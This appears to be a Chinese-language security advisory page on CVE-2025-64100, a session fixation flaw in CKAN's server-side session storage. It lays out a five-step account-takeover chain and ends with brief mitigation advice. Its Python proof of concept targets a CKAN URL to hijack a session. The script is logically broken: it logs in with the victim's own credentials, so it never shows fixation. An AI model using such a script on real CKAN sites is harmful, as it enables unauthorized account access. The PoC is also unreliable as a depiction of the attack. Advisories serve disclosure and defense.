CVE-2025-64100 CKAN会话固定漏洞

漏洞信息

漏洞编号

CVE-2025-64100

漏洞类型

会话固定（Session Fixation）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

CKAN

漏洞概述

CKAN是一款开源的数据管理系统（DMS），广泛应用于数据中心和开放数据平台。在2.10.9和2.11.4之前的版本中，存在一个会话固定安全漏洞。当CKAN配置为服务器端会话存储时（默认配置为基于cookie的会话存储），攻击者可以实施会话固定攻击。攻击者需要通过某种方式在受害者浏览器上设置特定的会话cookie，或者窃取受害者当前有效的会话标识符。由于会话标识符在用户登录后不会重新生成，攻击者预先设置的会话ID在受害者登录后仍然保持有效，从而允许攻击者劫持受害者会话。该漏洞影响所有使用服务器端会话存储的CKAN部署实例，可能导致未经授权访问用户账户和数据。

技术细节

会话固定漏洞的核心问题在于CKAN在用户认证成功后没有重新生成会话标识符。当网站使用服务器端会话存储时，攻击者可以：1）首先访问目标网站获取一个有效的会话ID；2）通过社会工程学手段（如钓鱼链接）或XSS等技术在受害者浏览器上设置相同的会话cookie；3）诱使受害者登录网站；4）由于会话ID未被刷新，攻击者可以使用之前获得的会话ID访问受害者已认证的会话。CVSS 3.1向量显示攻击复杂度为高（AC:H），需要用户交互（UI:R），攻击者位于网络位置（AV:N）且无需特殊权限（PR:N）。成功利用后会对机密性造成高影响（C:H），但不影响数据完整性和可用性。

攻击链分析

STEP 1

步骤1：侦察和信息收集

攻击者访问目标CKAN网站，获取一个有效的会话标识符（session ID）

STEP 2

步骤2：会话固定

攻击者通过钓鱼链接、XSS漏洞或中间人攻击等方式，在受害者浏览器上设置预先准备的会话cookie

STEP 3

步骤3：诱骗登录

攻击者诱使受害者访问CKAN网站并使用自己的账号登录系统

STEP 4

步骤4：会话劫持

由于CKAN在登录后未重新生成会话ID，攻击者之前设置的会话cookie仍然有效

STEP 5

步骤5：账户接管

攻击者使用固定的会话ID访问网站，即可劫持受害者的已认证会话，访问敏感数据或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import argparse

def session_fixation_poc(target_url, attacker_controlled_session):
    """
    Session Fixation PoC for CVE-2025-64100
    This PoC demonstrates the session fixation vulnerability in CKAN
    """
    # Step 1: Attacker obtains a valid session ID
    session = requests.Session()
    response = session.get(target_url)
    session_id = session.cookies.get('session_id') or attacker_controlled_session
    
    # Step 2: Injected session ID set on victim's browser (social engineering)
    # In real attack, this would be done via:
    # - Phishing link with ?session_id=ATTACKER_SESSION
    # - XSS payload setting the cookie
    # - MITM attack injecting the cookie
    
    # Step 3: Victim logs in (session ID not regenerated)
    login_url = f"{target_url}/user/login"
    login_data = {
        'login': 'victim_username',
        'password': 'victim_password'
    }
    response = session.post(login_url, data=login_data)
    
    # Step 4: Attacker uses the same session ID to hijack
    attacker_session = requests.Session()
    attacker_session.cookies.set('session_id', session_id)
    
    # Step 5: Access victim's authenticated session
    dashboard_url = f"{target_url}/user/dashboard"
    response = attacker_session.get(dashboard_url)
    
    if response.status_code == 200 and 'logged_in' in response.text:
        print('[+] Session hijacking successful!')
        print(f'[+] Session ID used: {session_id}')
    else:
        print('[-] Attack failed')

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-64100 Session Fixation')
    parser.add_argument('--url', required=True, help='Target CKAN URL')
    parser.add_argument('--session', help='Attacker-controlled session ID')
    args = parser.parse_args()
    session_fixation_poc(args.url, args.session)

影响范围

CKAN < 2.10.9

CKAN < 2.11.4

防御指南

临时缓解措施

如果无法立即升级，可暂时使用CKAN默认的基于cookie的会话存储配置（而非服务器端会话存储），并监控异常会话行为。同时加强对用户的安全意识培训，警惕钓鱼攻击和可疑链接。